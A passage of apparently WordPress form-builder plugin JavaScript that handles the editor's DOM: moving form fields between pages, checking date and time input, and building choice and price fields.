		{
			current_tr.nextSibling.nextSibling.nextSibling.nextSibling.firstChild.firstChild.firstChild.appendChild(document.getElementById(id));
			return;
		}
	}
	else
	{
		if(current_tr.nextSibling.getAttribute('type'))
		{
			current_tr.nextSibling.nextSibling.firstChild.firstChild.firstChild.appendChild(document.getElementById(id));
			return;
		}
	}
	
				
			///////////pagei mej
	page_down(id);

}

function right_row(id)
{
	tr=document.getElementById(id);
	table_big=tr.parentNode.parentNode;
	td_big=tr.parentNode.parentNode.parentNode;
	if(table_big.nextSibling!=null)
	{
		td_next=table_big.nextSibling;
		td_next.firstChild.appendChild(tr);
	
	}
	else
	{
		
	    var new_td = document.createElement('td');
		new_td.setAttribute("valign", "top");
		
	    var new_table = document.createElement('table');
			new_table.setAttribute("class", "wdform_table2");
	    var new_tbody = document.createElement('tbody');
	
	   // tr_big.appendChild(new_td);
	
	    td_big.appendChild(new_table);
	
	    new_table.appendChild(new_tbody);
	
	    new_tbody.appendChild(tr);
	    
	}
	
	if(table_big.firstChild.firstChild==null)
		td_big.removeChild(table_big);
	
}

function left_row(id)
{
	tr=document.getElementById(id);
	td_big=tr.parentNode.parentNode.parentNode;
	table_big=tr.parentNode.parentNode;
	if(table_big.previousSibling!=null)
	{
		
		table_previous=table_big.previousSibling;
		table_previous.firstChild.appendChild(tr);
		
	if(table_big.firstChild.firstChild==null)
		td_big.removeChild(table_big);
	}
	
}

function page_up(id)
{
	form=document.getElementById(id).parentNode;
	
			form_view_elemet		=form.parentNode.parentNode.parentNode.parentNode;
			form_view_elemet_copy	=form.parentNode.parentNode.parentNode.parentNode;
			
			table=form_view_elemet.parentNode;
			
			//alert(table);
			
			while(table)
			{
				table=table.previousSibling;	
				while(table)
				{
					if(table.tagName=="TABLE")
						break;
					else
						table=table.previousSibling;
				}
				
				if(!table)
				{
					alert('Unable to move');
					return;
				}
				form_maker_remove_spaces(table);
				if(jQuery(table.firstChild).is(":visible"))
					break;
									
			}
		
		
			n=table.firstChild.childNodes.length;
			
			table.firstChild.childNodes[n-2].firstChild.firstChild.firstChild.appendChild(document.getElementById(id));
		
		/*	glob_n=form_view_elemet_copy.firstChild.firstChild.childNodes.length;
			for(i=0; i<glob_n; i++)
			{
				if(table.firstChild.firstChild.childNodes[i])
				{
					to_add=table.firstChild.firstChild.childNodes[i];
					to_add.firstChild.firstChild.appendChild(document.getElementById(id));
				}
				else
				{
					to_add=table.firstChild.firstChild.firstChild;
					to_add.firstChild.firstChild.appendChild(document.getElementById(id));
				}
			}*/
		
		
			refresh_pages(id);



	

}

function page_down(id)
{
	form=document.getElementById(id).parentNode;
	
			form_view_elemet		=form.parentNode.parentNode.parentNode.parentNode;
			form_view_elemet_copy	=form.parentNode.parentNode.parentNode.parentNode;
			
			table=form_view_elemet.parentNode;
			
			while(table)
			{			
				table=table.nextSibling;	
				
				while(table)
				{
					if(table.tagName=="TABLE")
						break;
					else
						table=table.nextSibling;
				}
							
				if(!table)
				{
					alert('Unable to move');
					return;
				}
					
				if(jQuery(table.firstChild).is(":visible"))
					break;									
			}
		
			n=table.firstChild.childNodes.length;
			
			table.firstChild.firstChild.firstChild.firstChild.firstChild.insertBefore(document.getElementById(id), table.firstChild.firstChild.firstChild.firstChild.firstChild.firstChild);
			refresh_pages(id);

}



function Disable() {
  select_ = document.getElementById('sel_el_pos');
  select_.setAttribute("disabled", "disabled");
  select_.innerHTML = "";
}

/**
 * Remove witespaces from childNodes.
 */
function form_maker_remove_spaces(parent) {
  if (!parent) {
    parent = document;
  }
  var children = parent.childNodes;
  for (var i = children.length - 1; i >= 0; i--) {
    var child = children[i];
    if (child.nodeType == 3) {
      if (child.data.match(/^\s+$/)) {
        parent.removeChild(child);
      }
    }
    else {
      form_maker_remove_spaces(child);
    }
  }
}

function Enable() {
  var pos = document.getElementsByName("el_pos");
  pos[0].setAttribute("checked", "checked");
  select_ = document.getElementById('sel_el_pos');
  select_.innerHTML = "";
  for (k = 1; k <= form_view_max; k++) {
    if (document.getElementById('form_id_tempform_view'+k)) {
      form_view_element = document.getElementById('form_id_tempform_view' + k);
      form_maker_remove_spaces(form_view_element);
      n=form_view_element.childNodes.length-2;
      for (z = 0; z <= n; z++) {
        if (!form_view_element.childNodes[z].id) {
          GLOBAL_tr = form_view_element.childNodes[z];
          for (x = 0; x < GLOBAL_tr.firstChild.childNodes.length; x++) {
            table = GLOBAL_tr.firstChild.childNodes[x];
            tbody = table.firstChild;
            for (y = 0; y < tbody.childNodes.length; y++) {
              tr = tbody.childNodes[y];
              var option = document.createElement('option');
              option.setAttribute("id", tr.id + "_sel_el_pos");
              option.setAttribute("value", tr.id);
              option.innerHTML = document.getElementById( tr.id + '_element_labelform_id_temp').innerHTML;
              select_.appendChild(option);
            }
          }
        }
      }
    }
  }
  select_.removeAttribute("disabled");
}

function all_labels() {
	labels=new Array();
	for(k=1;k<=form_view_max;k++)
		if(document.getElementById('form_id_tempform_view'+k))
		{
			form_view_element=document.getElementById('form_id_tempform_view'+k);
      form_maker_remove_spaces(form_view_element);
			n=form_view_element.childNodes.length-2;
			for(z=0;z<=n;z++)
			{
					if(!form_view_element.childNodes[z].id)
					{
						GLOBAL_tr=form_view_element.childNodes[z];
						
						for (x=0; x < GLOBAL_tr.firstChild.childNodes.length; x++)
						{
							table=GLOBAL_tr.firstChild.childNodes[x];
							tbody=table.firstChild;
							for (y=0; y < tbody.childNodes.length; y++)
							{
								tr=tbody.childNodes[y];
								labels.push( document.getElementById(tr.id+'_element_labelform_id_temp').innerHTML);
							}
						}
					}
			}
		}
	
	return labels;
}

function set_checked(id,j)
{
	checking=document.getElementById(id+"_elementform_id_temp"+j);
	if(checking.checked)
		checking.setAttribute("checked", "checked");
	if(!checking.checked)
	{
		checking.removeAttribute("checked");
		if(checking.getAttribute('other'))
			if(checking.getAttribute('other')==1)
			{
				if(document.getElementById(id+"_other_inputform_id_temp"))
				{
					document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_brform_id_temp"));
					document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_inputform_id_temp"));
				}
				return false;
			}
	}
	return true;
}

function set_default(id, j)
{
	for(k=0; k<100; k++)
		if(document.getElementById(id+"_elementform_id_temp"+k))
			if(!document.getElementById(id+"_elementform_id_temp"+k).checked)
				document.getElementById(id+"_elementform_id_temp"+k).removeAttribute("checked");
			else
				document.getElementById(id+"_elementform_id_temp"+j).setAttribute("checked", "checked");
	
	if(document.getElementById(id+"_other_inputform_id_temp"))
	{
		document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_brform_id_temp"));
		document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_inputform_id_temp"));
	}
}

function set_select(select_)
{
	for (p = select_.length - 1; p>=0; p--) 
	    if (select_.options[p].selected) 
		select_.options[p].setAttribute("selected", "selected");
	    else
  		select_.options[p].removeAttribute("selected");
}

function add_0(id)
{
	input=document.getElementById(id);
	if(input.value.length==1)
	{
		input.value='0'+input.value;
		input.setAttribute("value", input.value);
	}
}

function change_hour(ev, id, hour_interval)
{
	if(check_hour(ev, id, hour_interval))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_minute(ev, id)
{
	if(check_minute(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_second(ev, id)
{
	if(check_second(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function check_hour(e, id, hour_interval)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	hour=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	hour=parseFloat(hour);
	if((hour<0) || (hour>hour_interval))
        	return false;
	return true;
} 

function check_minute(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	minute=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	minute=parseFloat(minute);
	if((minute<0) || (minute>59))
        	return false;
	return true;
} 

function check_second(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	second=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	second=parseFloat(second);
	if((second<0) || (second>59))
        	return false;
	return true;
} 

function change_day(ev, id)
{
	if(check_day(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_month(ev, id)
{
	if(check_month(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_year(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if((year>=from) && (year<=to))
		document.getElementById(id).setAttribute("value", year);
	else
		document.getElementById(id).setAttribute("value", '');
}

function check_day(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	day=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	if(day.length>2)
        	return false;
			
	if(day=='00')
        	return false;
			
	day=parseFloat(day);
	if((day<0) || (day>31))
        	return false;
	return true;
} 

function check_month(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	month=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	if(month.length>2)
        	return false;
			
	if(month=='00')
        	return false;
			
	month=parseFloat(month);
	if((month<0) || (month>12))
        	return false;
	return true;
} 

function check_year2(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	
	year=parseFloat(year);
	
	if(year<from)
	{
		document.getElementById(id).value='';
		alert('The value of "year" is not valid.');
	}
}

function check_year1(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	year=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if(year>to)
        	return false;
	return true;
} 

function label_top(num)
{	
	table=document.getElementById(num+'_elemet_tableform_id_temp');
	td1=document.getElementById(num+'_label_sectionform_id_temp');
	td2=document.getElementById(num+'_element_sectionform_id_temp');
    var table_t = document.createElement('tbody');
    var new_td1 = document.createElement('td');
    	new_td1 = td1;
    var new_td2 = document.createElement('td');
    	new_td2 = td2;
    var tr1 = document.createElement('tr');
    var tr2 = document.createElement('tr');
	//table.innerHTML=" ";
 while (table.firstChild)
      table.removeChild(table.firstChild);
    tr1.appendChild(new_td1);
    tr2.appendChild(new_td2);
    table_t.appendChild(tr1);
    table_t.appendChild(tr2);
    table.appendChild(table_t);
}

function label_left(num)
{
	table=document.getElementById(num+'_elemet_tableform_id_temp');
	td1=document.getElementById(num+'_label_sectionform_id_temp');
	td2=document.getElementById(num+'_element_sectionform_id_temp');
       var table_t = document.createElement('tbody');
    var new_td1 = document.createElement('td');
    	new_td1 = td1;
    var new_td2 = document.createElement('td');
    	new_td2 = td2;
    var tr = document.createElement('tr');
	//table.innerHTML=" ";
 while (table.firstChild)
      table.removeChild(table.firstChild);
    tr.appendChild(new_td1);
    tr.appendChild(new_td2);
    table_t.appendChild(tr);
    table.appendChild(table_t);
}

function delete_value(id)
{
	ofontStyle=document.getElementById(id).className;
	if(ofontStyle=="input_deactive")
	{
		document.getElementById(id).value="";
		destroyChildren(document.getElementById(id));
		document.getElementById(id).setAttribute("class", "input_active");
		document.getElementById(id).className='input_active';
	}
}

function return_value(id)
{
	input=document.getElementById(id);
	if(input.value=="")
	{
		input.value=input.title;
		input.className='input_deactive';
		input.setAttribute("class", 'input_deactive');
	}
}

function change_value(id)
{
	input=document.getElementById(id);
	 
	tag=input.tagName;
	if(tag=="TEXTAREA")
	{
// destroyChildren(input)
	input.innerHTML=input.value;
	}
	else
	input.setAttribute("value", input.value);

}

function change_input_value(first_value, id)
{	
	input=document.getElementById(id);
	input.title=first_value;
	
if( window.getComputedStyle ) 
{
  ofontStyle = window.getComputedStyle(input,null).fontStyle;
} else if( input.currentStyle ) {
  ofontStyle = input.currentStyle.fontStyle;
}
	if(ofontStyle=="italic")
	{	
		input.value=first_value;
		input.setAttribute("value", first_value);
	}
}

function change_file_value(destination, id, prefix , postfix )
{	
	if(typeof(prefix)=='undefined') {prefix=''; postfix=''};
	input=document.getElementById(id);
	input.value=prefix+destination+postfix;
	input.setAttribute("value", prefix+destination+postfix);
	
}

function close_window() {
  if (need_enable) {
    enable();
  }
  need_enable = true;
  document.getElementById('edit_table').innerHTML = "";
  document.getElementById('show_table').innerHTML = "";
  document.getElementById('main_editor').style.display = "none";
  if (document.getElementById("form_maker_editor_ifr")) {
    ifr_id = "form_maker_editor_ifr";
    ifr = getIFrameDocument(ifr_id);
    ifr.body.innerHTML = "";
  }
  document.getElementById('form_maker_editor').value = "";
  document.getElementById('editing_id').value = "";
  document.getElementById('element_type').value = "";
	alltypes = Array('customHTML', 'text', 'checkbox', 'radio', 'time_and_date', 'select', 'file_upload', 'captcha', 'map', 'button', 'page_break', 'section_break', 'paypal', 'survey');
  for (x = 0; x < 14; x++) {
      if (alltypes[x] != 'time_and_date' && alltypes[x] != 'select' && alltypes[x] != 'checkbox' && alltypes[x] != 'radio' && alltypes[x] != 'file_upload' && alltypes[x] != 'paypal' && alltypes[x] != 'survey') {
      document.getElementById('img_' + alltypes[x]).parentNode.style.backgroundColor = '';
    }
  }
}

function change_label(id, label) {
  label = label.replace(/(<([^>]+)>)/ig, "");
  document.getElementById(id).innerHTML = label;
  document.getElementById(id).value = label;
}

function change_label_1(id, label) {
  document.getElementById(id).value = label;
}

function change_label_price(id, label) {
  document.getElementById(id).innerHTML = label;
}

function change_value_price(id, label) {
  document.getElementById(id).value = label;
}

function change_func(id, label) {
  document.getElementById(id).setAttribute("onclick", label);
}

function change_in_value(id, label) {
  label = label.replace(/(<([^>]+)>)/ig, "");
  label = label.replace(/"/g, "&quot;");
	document.getElementById(id).setAttribute("value", label);
}

function change_size(size, num)
{
	document.getElementById(num+'_elementform_id_temp').style.width=size+'px';
	if(document.getElementById(num+'_element_input'))
		document.getElementById(num+'_element_input').style.width=size+'px';
	switch(size)
	{
		case '111':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "2"); break;
		}
		case '222':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "4");break;
		}
		case '444':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "8");break;
		}
	}
}

function add_choise_price(type, num) {
  var q = 0;
  if (document.getElementById(num + '_hor')) {
    q = 1;
    flow_ver(num);
  }
  j++;
  if (type == 'radio' || type == 'checkbox') {
    element = 'input';
    var table = document.getElementById(num + '_table_little');
    var tr = document.createElement('tr');
    tr.setAttribute("id", num + "_element_tr" + j);
    var td = document.createElement('td');
    td.setAttribute("valign", "top");
    td.setAttribute("id", num + "_td_little" + j);
    td.setAttribute("idi", j);
    var adding = document.createElement(element);
    adding.setAttribute("type", type);
    adding.setAttribute("value", "");
    adding.setAttribute("id", num + "_elementform_id_temp" + j);
    if (type == 'checkbox') {
      adding.setAttribute("onClick", "set_checked('" + num + "','" + j + "','form_id_temp')");
      adding.setAttribute("name", num + "_elementform_id_temp" + j);
    }
		if (type == 'radio') {
      adding.setAttribute("onClick", "set_default('" + num + "','" + j + "','form_id_temp')");
      adding.setAttribute("name", num + "_elementform_id_temp");
    }
    var label_adding = document.createElement('label');
    label_adding.setAttribute("id", num + "_label_element" + j);
    label_adding.setAttribute("class", "ch_rad_label");
    label_adding.setAttribute("for",num+"_elementform_id_temp"+j);
    var adding_ch_label = document.createElement('input');
    adding_ch_label.setAttribute("type", "hidden");
    adding_ch_label.setAttribute("id", num+"_elementlabel_form_id_temp"+j);
    adding_ch_label.setAttribute("name", num+"_elementform_id_temp"+j+"_label");
    adding_ch_label.setAttribute("value", "");
    td.appendChild(adding);
    td.appendChild(label_adding);
    td.appendChild(adding_ch_label);
    tr.appendChild(td);
    table.appendChild(tr);
    var choices_td= document.getElementById('choices');
    var br = document.createElement('br');
    br.setAttribute("id", "br"+j);
    var el_choices = document.createElement('input');
    el_choices.setAttribute("id", "el_choices"+j);
    el_choices.setAttribute("type", "text");
    el_choices.setAttribute("value", "");
    el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
    el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_element"+j+"', this.value); change_label_1('"+num+"_elementlabel_form_id_temp"+j+"', this.value); ");
    var el_choices_remove = document.createElement('img');
    el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
    el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px';
    el_choices_remove.setAttribute("align", 'top');
    el_choices_remove.setAttribute("onClick", "remove_choise_price('"+j+"','"+num+"')");
    var el_choices_price = document.createElement('input');
    el_choices_price.setAttribute("id", "el_option_price"+j);
    el_choices_price.setAttribute("type", "text");
    el_choices_price.setAttribute("value", '');
    el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
    el_choices_price.setAttribute("onKeyUp", "change_value_price('"+num+"_elementform_id_temp"+j+"', this.value)");
    el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
    choices_td.appendChild(br);
    choices_td.appendChild(el_choices);
    choices_td.appendChild(el_choices_price);
    choices_td.appendChild(el_choices_remove);
		if (type == 'checkbox') {
      refresh_id_name(num, 'type_checkbox');
    }
    if (type == 'radio') {
      refresh_id_name(num, 'type_radio');
    }
    refresh_attr(num, 'type_checkbox');
  }
  if (type == 'select') {
    var select_ = document.getElementById(num+'_elementform_id_temp');
    var option = document.createElement('option');
    option.setAttribute("id", num+"_option"+j);
    select_.appendChild(option);
    var choices_td= document.getElementById('choices');
    var br = document.createElement('br');
    br.setAttribute("id", "br"+j);
    var el_choices = document.createElement('input');
    el_choices.setAttribute("id", "el_option"+j);
    el_choices.setAttribute("type", "text");
    el_choices.setAttribute("value", "");
    el_choices.style.cssText =   "width:100px; margin:1px; padding:0; border-width: 1px";
    el_choices.setAttribute("onKeyUp", "change_label_price('"+num+"_option"+j+"', this.value)");
    var el_choices_price = document.createElement('input');
    el_choices_price.setAttribute("id", "el_option_price"+j);
    el_choices_price.setAttribute("type", "text");
    el_choices_price.setAttribute("value", '');
    el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
    el_choices_price.setAttribute("onKeyUp", "change_value_price('"+num+"_option"+j+"', this.value)");
    el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
    var el_choices_remove = document.createElement('img');
    el_choices_remove.setAttribute("id", "el_option"+j+"_remove");
    el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle;  margin-left:4px;';
    el_choices_remove.setAttribute("align", 'top');
    el_choices_remove.setAttribute("onClick", "remove_option_price('"+j+"','"+num+"')");
    var el_choices_dis = document.createElement('input');
    el_choices_dis.setAttribute("type", 'checkbox');
    el_choices_dis.setAttribute("id", "el_option"+j+"_dis");
    el_choices_dis.setAttribute("onClick", "dis_option_price('"+num+"','"+j+"', this.checked)");
    el_choices_dis.style.cssText ="vertical-align: middle; margin-right:24px; margin-left:24px;";
    choices_td.appendChild(br);
    choices_td.appendChild(el_choices);
    choices_td.appendChild(el_choices_price);
    choices_td.appendChild(el_choices_dis);
    choices_td.appendChild(el_choices_remove);
  }
  if (q == 1) {
    flow_hor(num);
  }
}

function add_choise(type, num) {
	j++;
	if (type=='radio' || type=='checkbox') {
		var choices_td = document.getElementById('choices');
		var br = document.createElement('br');
		br.setAttribute("id", "br"+j);
		var el_choices = document.createElement('input');
		el_choices.setAttribute("id", "el_choices"+j);
		el_choices.setAttribute("type", "text");
		el_choices.setAttribute("value", "");
		el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
		el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_element"+j+"', this.value); change_in_value('"+num+"_elementform_id_temp"+j+"', this.value)");
		var el_choices_remove = document.createElement('img');
    el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
    el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:3px';
    el_choices_remove.setAttribute("align", 'top');
    el_choices_remove.setAttribute("onClick", "remove_choise('"+j+"','"+num+"','"+type+"')");
    choices_td.appendChild(br);
    choices_td.appendChild(el_choices);
    choices_td.appendChild(el_choices_remove);
		refresh_rowcol(num, type);
		if (type=='checkbox') {
			refresh_id_name(num, 'type_checkbox');
      refresh_attr(num, 'type_checkbox');
		}
		if (type == 'radio') {
			refresh_id_name(num, 'type_radio');
      refresh_attr(num, 'type_radio');
		}
	}
	if (type == 'select') {
		var select_ = document.getElementById(num+'_elementform_id_temp');
		var option = document.createElement('option');
    option.setAttribute("id", num+"_option"+j);
    select_.appendChild(option);
		var choices_td= document.getElementById('choices');
		var br = document.createElement('br');
		br.setAttribute("id", "br"+j);
		var el_choices = document.createElement('input');
    el_choices.setAttribute("id", "el_option"+j);
    el_choices.setAttribute("type", "text");
    el_choices.setAttribute("value", "");
    el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
    el_choices.setAttribute("onKeyUp", "change_label('"+num+"_option"+j+"', this.value)");
		var el_choices_remove = document.createElement('img');
    el_choices_remove.setAttribute("id", "el_option"+j+"_remove");
    el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
    el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
    el_choices_remove.setAttribute("align", 'top');
    el_choices_remove.setAttribute("onClick", "remove_option('"+j+"','"+num+"')");
		var el_choices_dis = document.createElement('input');
    el_choices_dis.setAttribute("type", 'checkbox');
    el_choices_dis.setAttribute("id", "el_option"+j+"_dis");
    el_choices_dis.setAttribute("onClick", "dis_option('"+num+"_option"+j+"', this.checked)");
    el_choices_dis.style.cssText = "vertical-align: middle; margin-left:24px; margin-right:24px;";
    choices_td.appendChild(br);
    choices_td.appendChild(el_choices);
    choices_td.appendChild(el_choices_dis);
    choices_td.appendChild(el_choices_remove);
  }
}

function refresh_rowcol(num, type) {
  if (document.getElementById('edit_for_rowcol').value) {
    document.getElementById(num+'_rowcol_numform_id_temp').value = document.getElementById('edit_for_rowcol').value;
    var table = document.getElementById(num+'_table_little');
    table.removeAttribute("for_hor");
		table.innerHTML = "";
    var choeices = 0;
    if (document.getElementById('edit_for_flow_vertical').checked == true) {
      var columns = document.getElementById('edit_for_rowcol').value;
      for (i = 0; i <= 100; i++) {
        if (document.getElementById('el_choices' + i)) {
          choeices++;
        }
      }
      element = 'input';
      rows = parseInt((choeices + 1) / columns);
      var gago = 0;
			var vaxo = 1;
			var tr_row = document.createElement('tr');
  		tr_row.setAttribute("id", num+"_element_tr0");
			for (i=0;i<=100;i++)	{
				if (document.getElementById('el_choices'+i)) {									
					if (gago >= columns) {
            gago=0;
            var tr_row = document.createElement('tr');
            tr_row.setAttribute("id", num+"_element_tr"+vaxo);	
            vaxo++;
					}
          var td = document.createElement('td');
          td.setAttribute("valign", "top");
          td.setAttribute("id", num+"_td_little"+i);
          td.setAttribute("idi", i);
							var adding = document.createElement(element);
							adding.setAttribute("type", type);
							adding.setAttribute("value", document.getElementById("el_choices"+i).value);
							adding.setAttribute("id", num+"_elementform_id_temp"+i);
							if(type=='checkbox')
							{
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onclick", "if(set_checked('"+num+"','"+i+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
								}
								else
									adding.setAttribute("onclick", "set_checked('"+num+"','"+i+"','form_id_temp')");
		
									adding.setAttribute("name", num+"_elementform_id_temp"+i);
							}
								
							if(type=='radio')
							{
							adding.setAttribute("name", num+"_elementform_id_temp");
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp'); show_other_input('"+num+"','form_id_temp');");
									
								}
								else
								adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp')");
							}
							
							
							
							var label_adding = document.createElement('label');
								label_adding.setAttribute("id", num+"_label_element"+i);
								label_adding.setAttribute("class", "ch_rad_label");
								label_adding.setAttribute("for",num+"_elementform_id_temp"+i);
								label_adding.innerHTML=document.getElementById("el_choices"+i).value;
								
								td.appendChild(adding);
								td.appendChild(label_adding);
								
							tr_row.appendChild(td);	
							table.appendChild(tr_row);	
					
					
					gago++;
					
			
				}
			

			
			}

			
		  }

	else{

			var rows = document.getElementById('edit_for_rowcol').value;

			for(i=0;i<=100;i++)	
			{
				if(document.getElementById('el_choices'+i))
				choeices++;
			} 

			element='input';
			columns = parseInt((choeices+1)/rows);

			
			var gago=0;
			var vaxo=0;
			for(i=0;i<=100;i++)	
			{
				if(document.getElementById('el_choices'+i))
				{
			
					if(gago < rows)
					{
						var tr_row = document.createElement('tr');
							tr_row.setAttribute("id", num+"_element_tr"+i);
							
					}
					  
							var td = document.createElement('td');
								td.setAttribute("valign", "top");
								td.setAttribute("id", num+"_td_little"+i);
								td.setAttribute("idi", i);
							
							
							var adding = document.createElement(element);
							adding.setAttribute("type", type);
							adding.setAttribute("value", document.getElementById("el_choices"+i).value);
							adding.setAttribute("id", num+"_elementform_id_temp"+i);
							if(type=='checkbox')
							{
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onclick", "if(set_checked('"+num+"','"+i+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
								}
								else
									adding.setAttribute("onclick", "set_checked('"+num+"','"+i+"','form_id_temp')");
		
									adding.setAttribute("name", num+"_elementform_id_temp"+i);
							}
								
							if(type=='radio')
							{
							adding.setAttribute("name", num+"_elementform_id_temp");
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp'); show_other_input('"+num+"','form_id_temp')");
									
								}
								else
								adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp')");
							}
							
							var label_adding = document.createElement('label');
								label_adding.setAttribute("id", num+"_label_element"+i);
								label_adding.setAttribute("class", "ch_rad_label");
								label_adding.setAttribute("for",num+"_elementform_id_temp"+i);
								label_adding.innerHTML=document.getElementById("el_choices"+i).value;
								td.appendChild(adding);
								td.appendChild(label_adding);
						
						
							if(gago < rows)
							{
							tr_row.appendChild(td);	
							table.appendChild(tr_row);
							}
							else
							{
							if(vaxo==rows)
							vaxo=0;
							tr_row = document.getElementById(num+'_table_little').childNodes[vaxo];
							tr_row.appendChild(td);	
							vaxo++;
							}					
								
							
							gago++;
						
					
					
					
			
				}
			

			
			}
			table.setAttribute("for_hor", num+"_hor");
		}
	}
else
{
document.getElementById(num+'_rowcol_numform_id_temp').value = '';

	var table = document.getElementById(num+'_table_little');
		table.innerHTML="";
	
	var tr0 = document.createElement('tr');
		tr0.setAttribute("id", num+"_hor");
		
		
		for(i=0;i<=100;i++)	
			{
				if(document.getElementById('el_choices'+i))
				{
		
		element='input';
	
	  if(document.getElementById('edit_for_flow_vertical').checked==true)
	  {
		var tr = document.createElement('tr');
			tr.setAttribute("id", num+"_element_tr"+i);
		var td = document.createElement('td');
			td.setAttribute("valign", "top");
			td.setAttribute("id", num+"_td_little"+i);
			td.setAttribute("idi", i);
		
		var adding = document.createElement(element);
		adding.setAttribute("type", type);
		adding.setAttribute("value", document.getElementById("el_choices"+i).value);
		adding.setAttribute("id", num+"_elementform_id_temp"+i);
		if(type=='checkbox')
							{
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onclick", "if(set_checked('"+num+"','"+i+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
								}
								else
									adding.setAttribute("onclick", "set_checked('"+num+"','"+i+"','form_id_temp')");
		
									adding.setAttribute("name", num+"_elementform_id_temp"+i);
							}
								
							if(type=='radio')
							{
							adding.setAttribute("name", num+"_elementform_id_temp");
								if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && document.getElementById("el_choices"+i).getAttribute('other')=='1')
								{
									adding.setAttribute("other", "1");
									adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp'); show_other_input('"+num+"','form_id_temp')");
									
								}
								else
								adding.setAttribute("onClick", "set_default('"+num+"','"+i+"','form_id_temp')");
							}
		
		
		var label_adding = document.createElement('label');
			label_adding.setAttribute("id", num+"_label_element"+i);
			label_adding.setAttribute("class", "ch_rad_label");
			label_adding.setAttribute("for",num+"_elementform_id_temp"+i);
			label_adding.innerHTML=document.getElementById("el_choices"+i).value;
		    td.appendChild(adding);
		    td.appendChild(label_adding);
		    tr.appendChild(td);
			table.appendChild(tr);
			}
			
		else
		{
			var td = document.createElement('td');
				td.setAttribute("valign", "top");
